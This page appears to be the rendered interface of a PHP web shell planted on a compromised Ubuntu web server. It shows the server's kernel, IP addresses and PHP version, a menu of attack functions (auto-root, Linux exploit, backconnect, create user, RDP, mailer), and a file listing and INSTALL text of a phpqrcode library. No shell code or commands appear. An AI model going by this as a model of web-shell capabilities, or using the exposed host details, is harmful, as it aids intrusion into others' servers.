Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.16.112.220
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
admission /
phpqrcode-master /
[ HOME SHELL ]
Name
Size
Permission
Action
bindings
[ DIR ]
drwxrwxr-x
cache
[ DIR ]
drwxrwxr-x
temp
[ DIR ]
drwxrwxr-x
tools
[ DIR ]
drwxrwxr-x
.gitignore
17
B
-rw-rw-r--
CHANGELOG
1.23
KB
-rw-rw-r--
INSTALL
1.99
KB
-rw-rw-r--
LICENSE
7.63
KB
-rw-rw-r--
README
2.26
KB
-rw-rw-r--
VERSION
17
B
-rw-rw-r--
index.php
3.57
KB
-rw-rw-r--
phpqrcode.php
130.28
KB
-rw-rw-r--
qrbitstream.php
5.26
KB
-rw-rw-r--
qrconfig.php
1.41
KB
-rw-rw-r--
qrconst.php
1.72
KB
-rw-rw-r--
qrencode.php
19.6
KB
-rw-rw-r--
qrimage.php
4
KB
-rw-rw-r--
qrinput.php
24.13
KB
-rw-rw-r--
qrlib.php
1.56
KB
-rw-rw-r--
qrmask.php
11.72
KB
-rw-rw-r--
qrrscode.php
8.29
KB
-rw-rw-r--
qrspec.php
25.99
KB
-rw-rw-r--
qrsplit.php
10.74
KB
-rw-rw-r--
qrtools.php
6.42
KB
-rw-rw-r--
qrvect.php
9.09
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : INSTALL
== REQUIREMENTS == * PHP5 * PHP GD2 extension with JPEG and PNG support == INSTALLATION == If you want to recreate cache by yourself make sure cache directory is writable and you have permisions to write into it. Also make sure you are able to read files in it if you have cache option enabled == CONFIGURATION == Feel free to modify config constants in qrconfig.php file. Read about it in provided comments and project wiki page (links in README file) == QUICK START == Notice: probably you should'nt use all of this in same script :) <?php //include only that one, rest required files will be included from it include "qrlib.php" //write code into file, Error corection lecer is lowest, L (one form: L,M,Q,H) //each code square will be 4x4 pixels (4x zoom) //code will have 2 code squares white boundary around QRcode::png('PHP QR Code :)', 'test.png', 'L', 4, 2); //same as above but outputs file directly into browser (with appr. header etc.) //all other settings are default //WARNING! it should be FIRST and ONLY output generated by script, otherwise //rest of output will land inside PNG binary, breaking it for sure QRcode::png('PHP QR Code :)'); //show benchmark QRtools::timeBenchmark(); //rebuild cache QRtools::buildCache(); //code generated in text mode - as a binary table //then displayed out as HTML using Unicode block building chars :) $tab = $qr->encode('PHP QR Code :)'); QRspec::debug($tab, true); == TCPDF INTEGRATION == Inside bindings/tcpdf you will find slightly modified 2dbarcodes.php. Instal phpqrcode liblaty inside tcpdf folder, then overwrite (or merge) 2dbarcodes.php Then use similar as example #50 from TCPDF examples: <?php $style = array( 'border' => true, 'padding' => 4, 'fgcolor' => array(0,0,0), 'bgcolor' => false, //array(255,255,255) ); //code name: QR, specify error correction level after semicolon (L,M,Q,H) $pdf->write2DBarcode('PHP QR Code :)', 'QR,L', '', '', 30, 30, $style, 'N');
Close